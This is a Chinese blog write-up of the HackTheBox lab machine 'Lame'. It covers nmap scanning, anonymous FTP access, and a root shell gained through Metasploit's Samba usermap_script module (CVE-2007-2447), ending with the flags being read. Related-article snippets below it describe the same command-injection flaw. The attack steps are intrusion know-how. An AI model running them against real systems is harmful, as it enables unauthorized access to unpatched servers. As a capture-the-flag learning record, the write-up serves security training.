Lame-10.10.10.3

最新推荐文章于 2024-05-11 14:47:29 发布
最新推荐文章于 2024-05-11 14:47:29 发布
阅读量686 收藏 1
点赞数
文章标签: HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38895262/article/details/102740340
版权

10.10.10.3

该题用到 nmap、Metasploit

我拿到IP的第一个思路就是用nmap跑一下,-sC表示用脚本扫描,扫描后发现以下21、22、445端口,还发现21端口开着ftp服务,并且显示 FTP login allowed,继续往下看


发现Samba版本信息,3.X-4.X

(扫描脚本有地方报错,,暂时不管~)

扫描结果分析完后,尝试刚刚发现的ftp allowed 服务
命令  ftp 10.10.10.3  连接成功
命令 open10.10.10.3
默认的用户名 ftp   密码 ftp
ls 查看ftp里面装有哪些东东~
好像没有......所以命令 bye


刚刚还发现了Samba 的版本信息,用searchsploit samba 3命令查找samba 3 版本有哪些Exploit (searchsploit命令块)

补充:Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源

在exploit里面发现了samba 3的’Username‘map script'Command Execution .....命令执行漏洞


msfconsole 进入Metasploit 


search samba 在Metasploit里面搜索有没有刚发现的samba的命令执行漏洞,列表中已经存在该漏洞的脚本 


use exploit/multi/samba/usermap_script     选择使用漏洞模块


show options 列出该漏洞模块下的设置
RHOSTS   


set RHOSTS 10.10.10.3   设置攻击目标的IP地址
exploit 执行

[

成功进入主机
ls看看目录



pwd查看当前为什么用户
cd ~ 到home目录下
ls
发现 root.txt
cat root.txt
得到第一个flag
cd /home 到普通用户的home目录下
ls -l 查看该目录下的文件及其类型
cd user没有东西
cd makies  发现 user.txt
cat user.txt
get flag!

其类型
cd user没有东西
cd makies 发现 user.txt
cat user.txt
get flag!

miu-miu-milk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
3台物理机使用docker搭建rabbitmq镜像集群
AIGUO666666的博客
01-06 1192
一、准备3台linux机器 内核版本在3.10以上,三台机器的IP地址为 10.10.10.1 、10.10.10.2 、10.10.10.3 二、配置三台机器的hosts 10.10.10.1 dockerrabbitmqhostname1 rabbit1 10.10.10.2 dockerrabbitmqhostname2 rabbit2 10.10.10.3 dockerrabbitmqhostname3 rabbit3 配置hosts命令 ..
lame-3.99.3源码
02-07
在解压缩lame-3.99.3文件后,你会找到源代码、编译脚本、文档和其他相关资源。要使用这些源代码,你需要一个合适的编译环境,如GCC(GNU Compiler Collection)或者Visual Studio,并遵循提供的编译指南来构建LAME的...
使用web页面堆叠4台华为 S5720-52X-LI-AC交换机
agang1986的博客
05-24 2467
把光模块插入到各个交换机的编号为1和3的光口,然后按照:堆叠ID是0的交换机的3光口连接堆叠ID是1的交换机的1光口;堆叠ID是1的交换机的3光口连接堆叠ID是2的交换机的3光口,以此连接。最后堆叠ID是3的交换机的3光口回连到堆叠ID是0的交换机的1光口,整个连接形成环状。先让堆叠ID 0和堆叠ID 1的交换机上电,等堆叠完成后再上电堆叠ID 2的交换机,最后上电堆叠ID 3的交换机。逻辑端口配置也是stack-port0/1选择交换机的光口1和2,stack-port0/2选择交换机的。
如何通过开源项目搭建私有云平台--第三步:部署镜像仓库
kanganrui的专栏
04-18 670
前文再续,书接第二步,开始部署镜像仓库
Metasploit usermap_script漏洞相关笔记
isinstance的博客
12-06 4670
usermap_script:CVE-2007-2447Samba用户名映射脚本命令执行这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。 通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。 不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名!模块的位置 exploit/multi/samba/userm
HACKTHEBOX --Lame
最新发布
renielnxy的博客
05-11 220
这个就是简单的靶机,里面存在着很多经典的内容,建议大家刚开始学渗透的时候多去动手试试。
lame-3.98.3.tar.gz_lame_lame c++解码_lame-3.98.3.tar
09-20
MP3定点编解码源码,运行环境为visual studio 2008,已经通过编译运行。
lame-libs-3.100-6.el8.x86_64.rpm
12-07
官方离线安装包,亲测可用
lame-3.100.tar
05-05
LAME 是最好的MP3编码器,编码高品质MP3的最好也是唯一的选择。 也是学习c++ 的一个很好的入门项目
lame-encoder.zip
04-16
这个压缩包“lame-encoder.zip”包含了一些关键组件,用于实现MP3编码功能。下面将详细探讨其中的文件及其在音频处理中的作用。 首先,我们来看看压缩包中的核心文件: 1. **lame_enc.dll**:这是一个动态链接库...
一个古老的漏洞username map script,翻出来说说
weixin_33762321的博客
06-06 291
最近在学Metasploit×××测试,所以写一下这篇博客,希望能帮助到在学或者遇到了这个漏洞×××的小伙伴们~~ Username map script 是什么? Username map script是Samba协议的一个漏洞,ID为CVE-2007-2447,属于远程命令注入漏洞,主要影响Samba的3.0.20到3.0.25rc3 版本。 这个bug最初是针对匿名电话进行报告的到SamrC...
新手教程—Samba渗透远程命令注入漏洞 username map script(CVE-2007-2447 )
星虐
01-10 2422
Smaba 远程shell命令注入 (username map script) 文章目录Smaba 远程shell命令注入 (username map script)一、漏洞描述二、漏洞利用过程二、漏洞实验步骤 一、漏洞描述 漏洞编号 CVE-2007-2447 披露时间 2007-05-14 “username map script”是Samba协议的远程命令注入执行漏洞 漏洞路径 exploit/multi/samba/usermap_script 影响版本 samba 3.0.20-3.0.25
4.9、漏洞利用 smb-RCE远程命令执行
c10udz的博客
11-12 2478
1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。1.3 samba监听的端口。
ovn:最简单的ovn分布式网关实现Demo
shunzi2016的博客
01-20 1013
465efd10-c0e0-4966-be32-a20b213a2dbc 为 ha1 的uuid,可通过 ovn-nbctl ha-chassis-group-list 查看。#问题网关节点设置的ip不通,是因为路由器的网关接口mac与外部逻辑交换机的路由器端口mac地址不符。#==创建ovs端口=========================#==创建外部网络网桥================#经排查是未设置ls2交换机上的路由器端口的mac地址。#设置地址,必须和 lr1-ls1 的一致。
linux服务器配置双网卡(内网和外网)
weixin_41499668的博客
11-29 3693
假设:内网ip为10.10.10.3网关为10.10.10.1外网ip为211.170.1.105外网网关为211.171.1.1 开启两个网卡eth0 eth1 配置内网网卡 DEVICE =“eth0” BOOTPROTO =“静态” HWADDR =“34:97:F6:5C:35:6B” IPV6INIT =“是” MTU =“1500” NM_CONTROLLED =“是” ONBO...
NBMA网络OSPF point-to-multipoint non-broadcast
weixin_33892359的博客
06-23 439
在点到多点非广播模式下,必须静态指定邻居。 配置如同point-to-multipoint模式下,只是在指定OSPF网络类型时,使用命令ip ospf network point-to-multipoint non-broadcast,此时由于无法启用组播和广播,所以无法自动建立邻...
Openvswitch手册: QoS
w0823m的博客
05-12 955
这一节我们看QoS,Qos的设置往往是和flow中的policy一起使用的 Open vSwitch QoS capabilities 1 Interface rate limiting2 Port QoS policy QoS: Interface rate limiting A rate and burst can be assigned to an Interface
h.323 服务器 作用,Cisco CallManager服务器冗余的H.323 网关拨号对端配置
weixin_39545017的博客
07-30 747
语音、视频和集成数据 (AVVID) 设计的体系结构一般建议您具有主 Cisco CallManager 服务器和辅助 Cisco CallManager 服务器以实现冗余。如果主 Cisco CallManager 服务器发生故障,则辅助 Cisco CallManager 服务器将接管,并且 IP 电话将重定向到此服务器。此方案适用于 IP 电话到 IP 电话通信。不过,如果 H.323 网关...
Samba服务的username map script的漏洞相关信息
橡皮
12-21 2310
1、Username map script 是什么- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行 - 影响Samba的3.0.20到3.0.25rc3 版本 - 当使用非默认的用户名映射脚本配置选项时产生 - 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令2、如何利用1、使用metasploit框架 2、使用模块:/multi/samba/userm
严重性 代码 说明 项目 文件 行 禁止显示状态 错误 C1041 无法打开程序数据库“E:\TTS\SDK\lame-3.100\vc_solution\Release\vc143.pdb”;如果要将多个 CL.EXE 写入同一个 .PDB 文件,请使用 /FS app lame E:\TTS\SDK\lame-3.100\frontend\brhist.c 1
06-09
1. 在 Visual Studio 中打开 LAME 项目,选择“项目”菜单,然后选择“属性”。 2. 在“属性页”中,选择“C/C++”->“命令行”,在“其他选项”中添加 /FS 标志。 3. 重新编译 LAME 项目,此错误应该已经解决了。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值